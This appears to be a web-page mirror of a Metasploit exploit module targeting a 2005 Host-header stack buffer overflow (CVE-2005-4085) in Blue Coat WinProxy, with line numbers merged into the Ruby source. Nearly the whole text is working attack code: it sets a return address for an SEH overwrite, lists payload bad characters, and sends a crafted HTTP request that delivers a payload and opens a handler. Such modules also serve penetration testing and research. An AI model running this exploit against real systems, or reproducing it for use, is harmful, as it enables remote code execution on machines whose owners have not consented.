Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/exploits/windows/proxy/bluecoat_winproxy_host.rb
Views: 11784
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = GreatRanking78HttpFingerprint = { :method => 'HEAD', :pattern => [ /BlueCoat/ ] }910include Msf::Exploit::Remote::Tcp11include Msf::Exploit::Remote::Seh1213def initialize(info = {})14super(update_info(info,15'Name' => 'Blue Coat WinProxy Host Header Overflow',16'Description' => %q{17This module exploits a buffer overflow in the Blue Coat Systems WinProxy18service by sending a long port value for the Host header in a HTTP19request.20},21'Author' => 'MC',22'License' => MSF_LICENSE,23'References' =>24[25['CVE', '2005-4085'],26['OSVDB', '22238'],27['BID', '16147'],28['URL', 'http://www.bluecoat.com/support/knowledge/advisory_host_header_stack_overflow.html'],29],30'DefaultOptions' =>31{32'EXITFUNC' => 'thread',33},34'Payload' =>35{36'Space' => 600,37'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",38'StackAdjustment' => -3500,39},40'Platform' => 'win',41'Targets' =>42[43[ 'WinProxy <= 6.1 R1a Universal', { 'Ret' => 0x6020ba04 } ], # Asmdat.dll44],45'Privileged' => true,46'DisclosureDate' => '2005-01-05',47'DefaultTarget' => 0))4849register_options(50[51Opt::RPORT(80)52])5354end5556def exploit57connect5859print_status("Trying target #{target.name}...")6061sploit = "GET / HTTP/1.1" + "\r\n"62sploit += "Host: 127.0.0.1:"63sploit += rand_text_english(31, payload_badchars)64seh = generate_seh_payload(target.ret)65sploit[23, seh.length] = seh66sploit += "\r\n\r\n"6768sock.put(sploit)69sock.get_once(-1, 3)7071handler72disconnect73end74end757677